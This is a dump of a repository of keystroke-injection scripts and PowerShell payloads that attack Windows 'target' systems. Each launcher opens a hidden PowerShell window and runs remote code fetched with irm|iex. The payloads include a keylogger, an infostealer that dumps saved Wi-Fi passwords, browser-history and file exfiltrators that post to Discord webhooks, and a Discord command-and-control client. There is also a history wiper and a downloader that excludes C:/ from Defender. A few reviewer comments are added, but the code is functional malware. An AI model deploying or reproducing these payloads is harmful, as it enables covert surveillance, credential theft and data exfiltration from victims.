type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Browser-History-to-Discord/main.ps1 | iex");
delay(500);
press("ENTER");
--------------------------------------------------------------------------------
/Fast-Execution/Browser-History-to-Discord/README.md:
--------------------------------------------------------------------------------


Browser History and Bookmarks to Discord


SYNOPSIS

Gathers History and Bookmarks data from database files and sends it to discord

USAGE

1. Replace YOUR_WEBHOOK_HERE with your Discord webhook.
2. Run the script and check Discord for results.
--------------------------------------------------------------------------------
/Fast-Execution/Browser-History-to-Discord/main.ps1:
--------------------------------------------------------------------------------

# Webhook URL; $dc is expected to be set by the caller before this script runs.
$whuri = "$dc"

# Staging file for the collected URLs, created in the user's temp directory.
$outpath = "$env:temp\history.txt"
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII

# Define the Regular expression for extracting history and bookmarks
# (matches http/https URLs found as plain text inside the files below)
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'

# Define paths for data storage
# These are the browsers' own profile files. A process other than the browser
# reading them is a useful signal for file-access auditing or EDR rules.
# There is no 'firefox_bookmarks' key, so that lookup in the loop yields $null.
$Paths = @{
    'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"
    'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
    'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"
    'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks"
    'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"
    'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History"
    'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks"
}

# Define browsers and data
$Browsers = @('chrome', 'edge', 'firefox', 'opera')
$DataValues = @('history', 'bookmarks')

# For every browser/data-type pair: read the file as text, pull out the unique
# URL matches and append one record per URL to the staging file.
foreach ($Browser in $Browsers) {
    foreach ($DataValue in $DataValues) {
        $PathKey = "${Browser}_${DataValue}"
        $Path = $Paths[$PathKey]

        $Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique

        $Value | ForEach-Object {
            [PSCustomObject]@{
                Browser = $Browser
                DataType = $DataValue
                Content = $_
            }
        } | Out-File -FilePath $outpath -Append
    }
}

# Upload the staging file to the webhook as a multipart form with curl.exe,
# wait two seconds, then delete the staging file.
curl.exe -F file1=@"$outPath" $whuri | Out-Null
sleep 2
Remove-Item -Path $outPath -force
--------------------------------------------------------------------------------
/Fast-Execution/Clean-History/Clean-History.js:
--------------------------------------------------------------------------------
// Title: History Cleaner
// Author: @beigeworm
// Description: This script empties the temp folder and recycle bin, clear run box and powershell history
// Target: Windows 10

// script setup
layout("us")

// Open Powershell and download script
// Hidden-window PowerShell that fetches main.ps1 from raw.githubusercontent.com
// and runs it with Invoke-Expression.
delay(1000);
press("GUI r");
delay(1000);
type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Clean-History/main.ps1 | iex");
delay(500);
press("ENTER");

--------------------------------------------------------------------------------
/Fast-Execution/Clean-History/README.md:
--------------------------------------------------------------------------------


History Cleaner

3 | 4 | SYNOPSIS 5 | Empty the temp folder and recycle bin, clear run box and powershell history. 6 | 7 | USAGE 8 | 1. Run the script 9 | 10 | CREDIT 11 | this code was pulled from I-Am-Jakoby's recon script. 12 | 13 | #> 14 | -------------------------------------------------------------------------------- /Fast-Execution/Clean-History/main.ps1: -------------------------------------------------------------------------------- 1 | # Delete the contents of the current user's Temp folder (recursive; errors are suppressed) 2 | # NOTE(review): anti-forensic cleanup - each step below removes a per-user artifact that incident responders normally collect. 3 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 4 | 5 | # Delete Run dialog (Win+R) history 6 | # RunMRU stores the commands typed into the Run dialog; /va deletes every value under the key and /f skips the confirmation prompt. 7 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 8 | 9 | # Delete PowerShell command history 10 | # HistorySavePath is the file PSReadLine writes typed commands to. NOTE(review): these commands only remove per-user artifacts; process-creation and script-block logs, where enabled, are a separate record of this run. 11 | Remove-Item (Get-PSreadlineOption).HistorySavePath 12 | 13 | # Delete the contents of the recycle bin without prompting 14 | 15 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /Fast-Execution/Computer-Acid/Computer-ACID-Prank.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's GDI Effects Prank. 2 | // Author: @beigeworm 3 | // Description: This script uses GDI effects on the user's display to create visual effects for 90 seconds. 4 | // Target: Windows 10 5 | // NOTE(review): layout/delay/press/type are not defined in this file; presumably they come from the HID keystroke-injection runtime that executes it. 6 | // script setup 7 | layout("us") 8 | // NOTE(review): the typed command fetches main.ps1 from the repository's main branch at run time and pipes it to iex, so the code that executes is whatever that URL serves then, not a pinned copy. 9 | // Open the Run dialog (Win+R) and type a hidden PowerShell one-liner that downloads the script and runs it 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Computer-Acid/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Computer-Acid/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Computer Acid Prank

3 | 4 | SYNOPSIS 5 | 6 | this script generates GDI effects (VISUAL EFFECTS) on the desktop 7 | (lasts for 90 seconds before returning to normal) 8 | 9 | USAGE 10 | 11 | 1. Run script with powershell -------------------------------------------------------------------------------- /Fast-Execution/Discord-C2/Discord C2 Client.js: -------------------------------------------------------------------------------- 1 | 2 | // Title: beigeworm's Discord Command And Control. 3 | // Author: @beigeworm 4 | // Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform. 5 | // Target: Windows 10 and 11 6 | // SETUP 7 | // Goto https://pastebin.com and make an account.. 8 | // Create an empty paste/file and copy the RAW url. 9 | // Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt 10 | // Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx 11 | // for more info goto - https://github.com/beigeworm/PoshCord-C2 12 | 13 | // script setup 14 | layout("us") 15 | 16 | // Open Powershell 17 | delay(1000); 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex"); 21 | press("ENTER"); 22 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-C2/README.md: -------------------------------------------------------------------------------- 1 | # PoshCord-C2 2 | 3 | MAIN SCRIPT HERE - https://github.com/beigeworm/PoshCord-C2 4 | 5 | **SYNOPSIS** 6 | 7 | Using a Discord webhook and a hosted text file to Act as a Command and Control Platform. 8 | 9 | **INFORMATION** 10 | 11 | This script will wait until it notices a change in the contents of a text file hosted online (eg. github/pastebin). 
12 | Every 10 seconds it will check a file for a change in the file contents and interpret it as a custom command / module. 13 | 14 | *Using github to host your command file will take up to 5 minutes to run each module command - Use pastebin (account needed) OR your own server to host the txt file for instant response* 15 | 16 | **SETUP** 17 | 1. Goto https://pastebin.com and make an account.. 18 | 2. Create an empty paste/file and copy the RAW url. 19 | 3. Change YOUR_FILE_URL to the RAW url eg. https://pastebin.com/QeCLTdea -OR- http://your.server.ip.here/files/file.txt 20 | 4. Change YOUR_WEBHOOK_URL to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx 21 | 22 | **USAGE** 23 | 1. Setup the script 24 | 2. Run the script on a target. 25 | 3. Check discord for 'waiting to connect..' message. 26 | 4. Edit the contents of your hosted file to contain 'options' to get a list of modules 27 | 5. Do the same with any other command listed - To run that module. 28 | 29 | **MODULES** 30 | 1. `Message` : Send a message window to the Users desktop. 31 | 2. `SpeechToText` : Send microphone audio transcript to Discord 32 | 3. `Screenshot` : Sends a screenshot of the desktop to Discord. 33 | 4. `KeyCapture` : Capture Keystrokes and send to Discord. (see ExtraInfo for usage.) 34 | 5. `Exfiltrate` : Send various files to Discord zipped in 25mb files. (see ExtraInfo for usage.) 35 | 6. `Upload` : Upload a file to Discord. (see ExtraInfo for usage.) 36 | 7. `Systeminfo` : Send System information as text file to Discord. (takes a few minutes to gather data) 37 | 8. `RecordAudio` : Record microphone to Discord (RecordAudio -t 100) in seconds 38 | 9. `RecordScreen` : Record Screen to Discord (RecordScreen -t 100) in seconds 39 | 10. `TakePicture` : Send a webcam picture to Discord. (can take a few minutes..) 40 | 11. `FolderTree` : Save folder trees to file and send to Discord. 41 | 12. `FakeUpdate` : Spoof windows update screen. 42 | 13. 
`Nearby-Wifi` : Show nearby wifi networks 43 | 14. `Send-Hydra` : Never ending popups (use killswitch) 44 | 15. `AddPersistance` : Add this script to the startup folder. 45 | 16. `RemovePersistance` : Remove this script from the startup folder. 46 | 17. `IsAdmin` : Check if the session is admin. 47 | 18. `AttemptElevate` : Attempt to restart script as admin. (displays a UAC prompt to User) 48 | 19. `EnumerateLAN` : Show all devices on the network (see ExtraInfo for usage.) (can take a few miniutes to complete) 49 | 20. `Close` : Close this Session 50 | 21. `Options` : Show the Module menu 51 | 22. `ExtraInfo` : Show extra Module information 52 | 53 | 54 | **FEATURES** 55 | 56 | **Custom Scripting** 57 | 58 | Edit the hosted file contents to any custom powershell script or command to run custom powershell. 59 | 60 | **Killswitch** 61 | 62 | Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Discord Webhook with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 4. Replace DISCORD_WEBHOOK with your webhook 11 | 5. Run Script on target System 12 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/System-Info-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's system information to discord webhook 2 | // Author: @beigeworm 3 | // Description: This script gathers system information and posts to a discord webhook address with the results. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_info_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | 3 | $userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") 4 | $email = (Get-ComputerInfo).WindowsRegisteredOwner 5 | $systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name 6 | $userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] 7 | $ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion 8 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 9 | $outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){ 10 | if($a -gt 1 -And $s -NotMatch " policy " -And 
$s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()} 11 | $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;} 12 | 13 | $systemInfo = Get-WmiObject -Class Win32_OperatingSystem 14 | $processorInfo = Get-WmiObject -Class Win32_Processor 15 | $computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem 16 | $userInfo = Get-WmiObject -Class Win32_UserAccount 17 | $videocardinfo = Get-WmiObject Win32_VideoController 18 | $Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") 19 | $RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 20 | 21 | $users = "$($userInfo.Name)" 22 | $userString = "`nFull Name : $($userInfo.FullName)" 23 | 24 | $OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)" 25 | $systemString = "Processor : $($processorInfo.Name)" 26 | $systemString += "`nMemory : $RamInfo" 27 | $systemString += "`nGpu : $($videocardinfo.Name)" 28 | $systemString += "`nStorage : $Hddinfo" 29 | 30 | $infomessage = "``======================================================== 31 | 32 | Current User : $env:USERNAME 33 | Email Address : $email 34 | Language : $systemLanguage 35 | 
Keyboard Layout : $keyboardLayoutID 36 | Other Accounts : $users 37 | Public IP : $computerPubIP 38 | Current OS : $OSString 39 | Build : $ver 40 | Hardware Info 41 | -------------------------------------------------------- 42 | $systemString``" 43 | 44 | $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table 45 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 46 | $service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'} 47 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 48 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion 49 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 50 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 51 | $Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 52 | $Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 53 | $Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique 54 | $Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 55 | $pshist = 
"$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw 56 | $RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime 57 | 58 | $outpath = "$env:temp\systeminfo.txt" 59 | "--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $outpath -Encoding ASCII 60 | "General Info `n $infomessage" | Out-File -FilePath $outpath -Encoding ASCII -Append 61 | "Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $outpath -Encoding ASCII -Append 62 | "USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 63 | ($COMDevices| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 64 | "`n" | Out-File -FilePath $outpath -Encoding ASCII -Append 65 | "SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $outpath -Encoding ASCII -Append 66 | "Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 67 | ($software| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 68 | "Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 69 | ($process| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 70 | "Services `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 71 | ($service| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 72 | "Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath 
$outpath -Encoding ASCII -Append 73 | "`n" | Out-File -FilePath $outpath -Encoding ASCII -Append 74 | "HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $outpath -Encoding ASCII -Append 75 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 76 | ($Value| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 77 | ($Value2| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 78 | "Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 79 | ($pshistory| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 80 | "Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 81 | ($RecentFiles | Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 82 | 83 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json 84 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 85 | 86 | Sleep 1 87 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage"} | ConvertTo-Json 88 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 89 | 90 | curl.exe -F file1=@"$outpath" $hookurl 91 | Sleep 1 92 | Remove-Item -Path $outpath -force 93 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/Keylogger-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyloggger to Discord Webhook. 
2 | // Author: @beigeworm 3 | // Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | 19 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script gathers Keypress information and posts to a discord webhook address with the results only 8 | when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that. 9 | 10 | USAGE 11 | 12 | 1. Input your credentials below 13 | 2. Run Script on target System 14 | 3. Check Discord for results 15 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | # Import DLL Definitions for keyboard inputs 2 | $API = @' 3 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 4 | public static extern short GetAsyncKeyState(int virtualKeyCode); 5 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 6 | public static extern int GetKeyboardState(byte[] keystate); 7 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 8 | public static extern int MapVirtualKey(uint uCode, int uMapType); 9 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 10 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 11 | '@ 12 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 13 | 14 | # Add stopwatch for intellegent sending 15 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 16 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 17 | 18 | # Start a continuous loop 19 | While ($true){ 20 | $keyPressed = $false 21 | try{ 22 | # Start a loop that checks the time since last activity before message is sent 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | # Start the loop with 30 ms delay between keystate check 25 | Start-Sleep -Milliseconds 30 26 | for ($asc = 8; $asc -le 254; $asc++){ 27 | # Get the key state. 
(is any key currently pressed) 28 | $keyst = $API::GetAsyncKeyState($asc) 29 | # If a key is pressed 30 | if ($keyst -eq -32767) { 31 | # Restart the inactivity timer 32 | $keyPressed = $true 33 | $LastKeypressTime.Restart() 34 | $null = [console]::CapsLock 35 | # Translate the keycode to a letter 36 | $vtkey = $API::MapVirtualKey($asc, 3) 37 | # Get the keyboard state and create stringbuilder 38 | $kbst = New-Object Byte[] 256 39 | $checkkbst = $API::GetKeyboardState($kbst) 40 | $logchar = New-Object -TypeName System.Text.StringBuilder 41 | # Define the key that was pressed 42 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 43 | # Check for non-character keys 44 | $LString = $logchar.ToString() 45 | if ($asc -eq 8) {$LString = "[BKSP]"} 46 | if ($asc -eq 13) {$LString = "[ENT]"} 47 | if ($asc -eq 27) {$LString = "[ESC]"} 48 | # Add the key to sending variable 49 | $send += $LString 50 | } 51 | } 52 | } 53 | } 54 | } 55 | finally{ 56 | If ($keyPressed) { 57 | # Send the saved keys to a webhook 58 | $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 59 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 60 | $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' 61 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json 62 | Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys 63 | #Remove log file and reset inactivity check 64 | $send = "" 65 | $keyPressed = $false 66 | } 67 | } 68 | # reset stopwatch before restarting the loop 69 | $LastKeypressTime.Restart() 70 | Start-Sleep -Milliseconds 10 71 | } 72 | -------------------------------------------------------------------------------- /Fast-Execution/Download-and-Execute/Download-Execute.js: -------------------------------------------------------------------------------- 1 | // Title: Download-Execute from Run Prompt 2 | // Author: @beigeworm | https://github.com/beigeworm 
3 | // Description: Uses the Run Prompt to download a file and run it. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace FILE_URL_HERE with the url of your file to run. 7 | 8 | // Open Powershell as Admin 9 | press("GUI r"); 10 | delay(1000); 11 | type("powershell -NoP -Ep Bypass -W H -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit"); 12 | delay(500); 13 | press("CONTROL SHIFT ENTER"); 14 | delay(3000); 15 | press("ALT y"); -------------------------------------------------------------------------------- /Fast-Execution/Download-and-Execute/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Download and Execute exe files

3 | 4 | SYNOPSIS 5 | 6 | Uses the Run Prompt to download a file and run it. 7 | 8 | USAGE 9 | 10 | replace FILE_URL_HERE with the url of your file to run. 11 | Run script on target Windows system. 12 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/Exfiltrate-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Discord 2 | // Author: @beigeworm 3 | // Description: This script searches the user's folders for pictures, documents, logs, PDFs and more, then sends it all to a Discord Webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace WEBHOOK_HERE with your Discord Webhook. 7 | // NOTE(review): is.gd is a URL shortener, so the script piped to iex is whatever the short link resolves to at run time; it is not pinned to the main.ps1 listed in this repository. 8 | // script setup 9 | layout("us") 10 | // NOTE(review): the webhook URL is placed in $dc on the typed command line, so process command-line logging records the upload destination together with the -NoP -Ep Bypass -W H launcher flags. 11 | // Open the Run dialog (Win+R) and type a hidden PowerShell one-liner that downloads the script and runs it 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script searches the user folders for specific filetypes to upload to Discord zipped. 7 | 8 | SETUP 9 | 10 | Create a webhook in a discord server channel settings. 11 | Replace WEBHOOK_HERE with your webhook. 12 | 13 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | 3 | Function Exfiltrate { 4 | 5 | param ([string[]]$FileType,[string[]]$Path) 6 | $maxZipFileSize = 25MB 7 | $currentZipSize = 0 8 | $index = 1 9 | $zipFilePath ="$env:temp/Loot$index.zip" 10 | 11 | If($Path -ne $null){ 12 | $foldersToSearch = "$env:USERPROFILE\"+$Path 13 | }else{ 14 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 15 | } 16 | 17 | If($FileType -ne $null){ 18 | $fileExtensions = "*."+$FileType 19 | }else { 20 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 21 | } 22 | 23 | Add-Type -AssemblyName System.IO.Compression.FileSystem 24 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 25 | 26 | foreach ($folder in $foldersToSearch) { 27 | foreach ($extension in $fileExtensions) { 28 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 29 | foreach ($file in $files) { 30 | $fileSize = $file.Length 31 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 32 | $zipArchive.Dispose() 33 | $currentZipSize = 0 34 | curl.exe -F file1=@"$zipFilePath" $hookurl 35 | Remove-Item -Path $zipFilePath -Force 36 | Sleep 1 37 | $index++ 38 | $zipFilePath ="$env:temp/Loot$index.zip" 39 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 40 | } 41 
| $entryName = $file.FullName.Substring($folder.Length + 1) 42 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 43 | $currentZipSize += $fileSize 44 | } 45 | } 46 | } 47 | $zipArchive.Dispose() 48 | curl.exe -F file1=@"$zipFilePath" $hookurl 49 | Remove-Item -Path $zipFilePath -Force 50 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 51 | } 52 | 53 | Exfiltrate 54 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Dropbox 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DROPBOX_TOKEN with your Dropbox Token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-Dropbox/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/README.md: -------------------------------------------------------------------------------- 1 | 